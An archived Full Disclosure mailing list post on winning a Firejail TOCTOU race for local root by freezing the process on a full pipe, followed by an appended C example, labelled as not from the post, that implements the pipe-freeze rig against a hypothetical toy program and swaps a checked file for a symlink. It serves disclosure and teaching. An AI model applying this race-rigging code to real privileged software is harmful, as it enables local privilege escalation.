Full Disclosure mailing list archives

Rigged Race Against Firejail for Local Root: Using pipes/ptys to win races


From: Roman Fiedler <roman.fiedler () unparalleled eu>
Date: Thu, 18 Feb 2021 08:56:30 +0000

Hello List,

100% reliable exploitation of file system time races (TOCTOU
vulnerabilities) may be hard as the timing depends on numerous
target system parameters (CPU cores, load, memory pressure, file
system type, ...). Instead of optimizing the exploit to win the
real race, the timing of Firejail stderr and stdout output was
analyzed. With the correct parameters known the Firejail process
can be frozen exactly in the right moment when attempting to
write a message to a filled pipe (blocking write). Thus the exploit
has any time in the world to modify the file system before restarting
Firejail by emptying the pipe again.

The technique proved useful to cut down the time required from
vulnerability discovery to creating a working exploit using the
recipe given in [1].

[1] https://unparalleled.eu/blog/2021/20210208-rigged-race-against-firejail-for-local-root/
[2] https://unparalleled.eu/blog/2021/20210208-rigged-race-against-firejail-for-local-root/UnjailMyHeart.c
[3] https://unparalleled.eu/publications/2021/advisory-unpar-2021-0.txt

Kind regards,
Roman Fiedler

| |  DI Roman Fiedler
| /  roman.fiedler at unparalleled.eu  +43 677 63 29 28 29
/ |  Unparalleled IT Services e.U.     FN: 516074h           VAT: ATU75050524
| |  https://unparalleled.eu/          Felix-Dahn-Platz 4, 8010 Graz, Austria


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
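The freeze-on-a-full-pipe technique described in the post, as an added worked example. This is not code from the post or from UnjailMyHeart.c and it does not target Firejail: the victim is a hypothetical TOCTOU-prone program (toy_target, which refuses symlinks with lstat() and then open()s the path), and the message strings BANNER and PROGRESS, the /proc/<pid>/stat-based freeze detector, the temp-directory layout and the function names are all assumptions of the example. The rig pre-fills the target's stdout pipe so that exactly the bytes of the message it prints before its check still fit; the message it prints between check and use then blocks, the attacker swaps the file without any timing pressure, and draining the pipe lets the target continue into its use step.

```c
/* Added example (not the post's code): freeze a TOCTOU-prone target on a blocking pipe write.
 * Linux-specific: F_GETPIPE_SZ, FIONREAD on a pipe and /proc/<pid>/stat. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#ifndef F_GETPIPE_SZ
#define F_GETPIPE_SZ 1032          /* Linux fcntl command number, in case the header hides it */
#endif

/* The target's messages (assumed): for a real target these are its own lines, byte counts observed. */
static const char BANNER[]   = "target: checking path\n";             /* emitted before the check */
static const char PROGRESS[] = "target: path looks safe, opening\n";  /* emitted between check and use */

/* Hypothetical TOCTOU-prone target: exit 1 = the object opened is not the object checked. */
static int toy_target(const char *path)
{
    struct stat checked, used;
    write(1, BANNER, sizeof BANNER - 1);
    if (lstat(path, &checked) != 0 || !S_ISREG(checked.st_mode)) return 2;  /* check: no symlinks */
    write(1, PROGRESS, sizeof PROGRESS - 1);           /* blocks for as long as the pipe is full */
    int fd = open(path, O_RDONLY);                     /* use: open() follows a symlink */
    if (fd < 0 || fstat(fd, &used) != 0) return 3;
    close(fd);
    return used.st_ino != checked.st_ino;
}

/* Task state letter from /proc/<pid>/stat: 'R' running, 'S' interruptible sleep, 'Z' zombie. */
static char task_state(pid_t pid)
{
    char path[64], buf[512], *p;
    snprintf(path, sizeof path, "/proc/%d/stat", (int)pid);
    FILE *f = fopen(path, "r");
    if (!f) return '?';
    buf[fread(buf, 1, sizeof buf - 1, f)] = 0;
    fclose(f);
    p = strrchr(buf, ')');          /* comm may contain spaces: the state follows the last ')' */
    return (p && p[1] == ' ') ? p[2] : '?';
}

/* Frozen: the pipe holds exactly its capacity (so BANNER is in) and the target sleeps. After
 * BANNER the target's only blocking point is the PROGRESS write, so that sleep is the freeze. */
static int wait_until_frozen(pid_t pid, int rd, int capacity)
{
    struct timespec tick = {0, 1000000};            /* poll every 1 ms, give up after ~10 s */
    for (int i = 0; i < 10000; i++) {
        int pending = 0;
        char s = task_state(pid);
        if (s == '?' || s == 'Z' || ioctl(rd, FIONREAD, &pending) != 0) return -1;
        if (pending == capacity && s == 'S') return 0;
        nanosleep(&tick, NULL);
    }
    return -1;
}

/* One rigged race in a fresh temp directory. Returns the target's exit status
 * (1 = the swap landed between its check and its use) or -1 if the rig could not be set up. */
int rig_race(void)
{
    char dir[] = "/tmp/rigXXXXXX", target[64], sink[4096], *junk = NULL;
    int p[2] = {-1, -1}, cap, status = -1;
    size_t prefill;
    pid_t pid;
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/target", dir);
    if (close(open(target, O_WRONLY | O_CREAT, 0600)) != 0 || pipe(p) != 0) goto out;
    /* Pre-fill so that exactly strlen(BANNER) bytes stay free: BANNER still fits, PROGRESS cannot. */
    if ((cap = fcntl(p[1], F_GETPIPE_SZ)) < 0) goto out;
    prefill = (size_t)cap - (sizeof BANNER - 1);
    if (!(junk = malloc(prefill))) goto out;
    memset(junk, 'x', prefill);
    if (write(p[1], junk, prefill) != (ssize_t)prefill) goto out;
    if ((pid = fork()) < 0) goto out;
    if (pid == 0) { dup2(p[1], 1); _exit(toy_target(target)); }  /* child: stdout is the rigged pipe */
    /* Target is frozen: no atomic rename trick needed, plain unlink + symlink (here to the directory). */
    if (wait_until_frozen(pid, p[0], cap) != 0 ||
        unlink(target) != 0 || symlink(dir, target) != 0) {
        kill(pid, SIGKILL); waitpid(pid, NULL, 0); goto out;
    }
    for (size_t got = 0; got < (size_t)cap; ) {      /* drain: the blocked write completes, target resumes */
        ssize_t n = read(p[0], sink, sizeof sink);
        if (n <= 0) break;
        got += (size_t)n;
    }
    waitpid(pid, &status, 0);
    status = WIFEXITED(status) ? WEXITSTATUS(status) : -1;
out:
    free(junk);
    close(p[0]); close(p[1]);
    unlink(target); rmdir(dir);
    return status;
}
```

rig_race() returns 1 whenever the rig works: the target's lstat() saw a regular file, yet its open() landed on a different inode, which is exactly the window a timing-based exploit has to hit by luck. Two things gate the technique: the target has to emit its messages synchronously (explicit write() calls or an unbuffered stderr; a fully buffered stdout coalesces lines and the byte counts no longer match), and the byte count of everything it writes before the critical message must be known exactly, otherwise it freezes one message too early or not at all. The freeze detector here is a simplification that relies on the target having no other sleep between its pre-check output and the blocked write; a real target may need a stronger signal, such as /proc/<pid>/wchan or /proc/<pid>/syscall.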

